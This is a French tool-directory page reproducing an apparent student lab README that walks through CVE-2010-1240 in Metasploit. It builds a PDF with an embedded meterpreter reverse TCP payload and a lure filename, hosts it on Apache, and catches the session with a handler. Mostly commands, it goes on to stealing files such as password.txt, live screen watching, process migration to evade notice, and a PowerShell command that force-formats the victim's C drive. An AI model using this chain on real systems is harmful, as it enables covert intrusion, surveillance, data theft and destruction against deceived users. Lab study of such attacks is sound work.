Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Embedded-Backdoor-Connection — Cette vidéo de démonstration montre comment nous pouvons contrôler l'appareil de la victime en envoyant à la cible un fichier PDF d'apparence inoffensive qui contient en réalité une charge utile intégrée. L'exploit a été rendu public sous la référence CVE-2010-1240. | Kitploit
Outils/GitHubGitHub/omarothmann/embedded-backdoor-connection
Outils de PhishingGénération de PayloadsExploitationPost-ExploitationTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationLabs et Pratique

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
omarothmann/embedded-backdoor-connection

Embedded-Backdoor-Connection

Cette vidéo de démonstration montre comment nous pouvons contrôler l'appareil de la victime en envoyant à la cible un fichier PDF d'apparence inoffensive qui contient en réalité une charge utile intégrée. L'exploit a été rendu public sous la référence CVE-2010-1240.

Voir le dépôt
845il y a 4 ansPas encore vérifié

Connexion par porte dérobée intégrée via des fichiers PDF 😈

présenté par    

Introduction

Cette vidéo de démonstration montre comment nous pouvons contrôler l'appareil de la victime en envoyant un fichier PDF à l'apparence innocente qui contient en réalité une charge utile intégrée. L'exploit a été rendu public sous le nom de CVE-2010-1240.

Dès que le PDF est ouvert dans Adobe Reader, les utilisateurs que nous avons trompés pour qu'ils acceptent les fenêtres de sécurité contextuelles nous permettront d'obtenir une session meterpreter connectée à leurs appareils via une connexion TCP inverse. Pendant ce temps, toutes leurs données et ce qu'ils font en ce moment sont sous notre surveillance.

Hehe~Boi

Liste des logiciels/outils

  • Metasploit
  • Adobe Reader <= 8.1.2

Environnement

Kali Linux         Windows 7 or 10         Adobe Reader        

  • Machine de l'attaquant : Kali Linux version 2021.1
  • Système d'exploitation cible : Windows 10 (x86) ou Windows 7 (x86)
  • Logiciel cible : Adobe Reader 8.1.2

Étapes détaillées

Tout d'abord, nous lançons MSFconsole qui nous fournit une interface en ligne de commande pour accéder au framework Metasploit.

root@kitploit:~
msfconsole

Ensuite, recherchons un exploit correspondant à notre plateforme Windows cible et à Adobe PDF Reader, ce qui affichera une liste complète d'exploits pouvant être utilisés pour pirater la machine Windows de la victime et exploiter les vulnérabilités d'Adobe PDF Reader.

root@kitploit:~
search type:exploit platform:windows adobe pdf

Dans cette exploitation, nous sélectionnons et utilisons le module "adobe_pdf_embedded_exe" avec la commande ci-dessous pour parvenir au détournement de la victime.

root@kitploit:~
use exploit/windows/fileformat/adobe_pdf_embedded_exe

Nous pouvons également vérifier les informations de l'exploit en utilisant la commande « info » comme ci-dessous :

root@kitploit:~
info

Ensuite, nous configurons le payload pour utiliser une connexion TCP inverse. Nous utilisons également Meterpreter qui fournit un shell interactif nous permettant d'utiliser toutes sortes de fonctions en insérant et en exécutant du code pour explorer la machine de la victime.

root@kitploit:~
set payload windows/meterpreter/reverse_tcp

Ensuite, nous définissons l'hôte et le port d'écoute. Pour LHOST, nous devons saisir l'adresse IP de la machine de l'attaquant, qui dans ce cas est l'adresse IP de notre machine Kali (10.0.2.4)*.

  • *p.s.
    • Vous devez utiliser l'IP de votre propre machine Kali
    • Vous pouvez utiliser un numéro de port différent

Quant à LPORT, il nous appartient de choisir un numéro de port peu courant.

root@kitploit:~
# to check Kali machine’s IP address
ifconfig

set LHOST *10.0.2.4*
set LPORT 5665

Ensuite, nous définissons le fichier d'entrée servant de base au PDF avec le paramètre INFILENAME*. Puis, nous définissons le nom du fichier avec quelque chose qui suscitera l'intérêt de la victime pour ouvrir le fichier PDF malveillant.

  • *p.s.
    • Vous devez vérifier le chemin de votre fichier PDF
    • Vous pouvez utiliser un nom de fichier différent
root@kitploit:~
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'

Nous pouvons revoir nos options avant de saisir la commande « exploit » pour générer la charge utile avec le PDF.

root@kitploit:~
# Then we can show the info or options by
show info | show options

exploit

Une fois le fichier PDF généré, nous déplaçons le fichier vers /var/www/html, le répertoire de notre machine Kali, pour héberger le serveur d'application web afin que notre victime puisse télécharger le fichier PDF plus tard.

  • Note:
    • Si vous avez défini un nom de fichier différent, assurez-vous de copier le bon chemin !
root@kitploit:~
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html

Ensuite, pour configurer notre listener, nous utilisons "exploit/multi/handler". De nouveau, nous définissons le payload, LHOST et LPORT en accord avec ce que nous avons défini lors de la génération du fichier PDF malveillant. Puis nous exécutons le payload.

  • Note:
    • LHOST : N'oubliez pas d'indiquer l'adresse IP de votre propre machine Kali
    • LPORT : Si vous avez défini un numéro de port différent, assurez-vous de saisir le numéro correctement
    • show info ou show options est une commande facultative à exécuter.
      • L'exécuter sert simplement à vérifier ce que vous venez de configurer
root@kitploit:~
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run

Dans un autre terminal, nous vérifions le statut du serveur Apache pour nous assurer qu'il tourne afin d'héberger notre fichier PDF dans /var/www/html pour que la victime puisse le télécharger.

root@kitploit:~
service apache2 status

# If it is inactive, start the service
service apache2 start

Sur la machine Windows, ouvrez un navigateur quelconque tel que Chrome et saisissez l'IP de notre Kali (10.0.2.4)* pour accéder au serveur d'application web de la machine Kali.

*Note: N'oubliez pas d'indiquer l'adresse IP de votre propre machine Kali

Ensuite, simulez l'action d'un utilisateur enregistrant le fichier PDF prévu.

Lorsque la victime ouvre le fichier dans Adobe Reader 8.1.2 en acceptant les messages de sécurité, nous pouvons alors observer sur notre machine Kali qu'une nouvelle session s'est connectée via une connexion TCP inverse.

Dans un scénario réel, nous mettrons en place un site web contenant le PDF avec charge utile intégrée pour que la victime télécharge le fichier ou le reçoive en pièce jointe par e-mail.


Résultat de l'exploitation

Ensuite, nous pouvons accéder à distance à la machine de la victime et poursuivre avec d'autres comportements malveillants dans la session meterpreter.

Pour afficher une liste des actions possibles

root@kitploit:~
help

Lister le répertoire courant

root@kitploit:~
pwd

Lister les fichiers de ce répertoire

root@kitploit:~
ls

Télécharger un dossier ou un fichier depuis la machine de la victime

Par exemple, s'il y a un fichier nommé password.txt, nous pouvons exécuter la commande download password.txt

root@kitploit:~
download [folder name | filename with extension]

Créer un fichier sur la machine de la victime

Bien sûr, nous pouvons écrire un script malveillant (implanter une porte dérobée) pour continuer à nous connecter à la machine Windows si nous sommes vraiment diaboliques ! 💀

root@kitploit:~
   # Boot command prompt at background
   execute -f cmd.exe -H -i
   
   # Create file on Windows
   echo "You have been hacked" > hack.txt    

Interagir avec Windows

root@kitploit:~
   #open the txt file we have just created
   hack.txt

   # Take screenshot
   screenshot
   
   # Watch the remote user in real time
   screenshare

Supplément

Cependant, l'attaquant peut réduire les soupçons en migrant le processus meterpreter vers un autre processus à l'aide du module migrate dans la session meterpreter.

root@kitploit:~
meterpreter> run post/windows/manage/migrate

Ici, il générera automatiquement un nouveau processus dans la machine de la victime vers lequel se migrer. La victime pourra alors supprimer le fichier PDF infecté, sans se rendre compte que le processus est déjà parti ailleurs.

L'attaquant peut en outre créer un script malveillant sur la machine cible en utilisant l'invite de commandes (cmd) ou PowerShell, capable de faire tomber tout le système d'exploitation pour qu'il ne fonctionne plus correctement.

root@kitploit:~
meterpreter> shell 
root@kitploit:~
# Start the Windows PowerShell
powershell

#Powershell command to forcefully format the C drive clean.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false

Vidéo de démonstration

Demo

Télécharger l’outil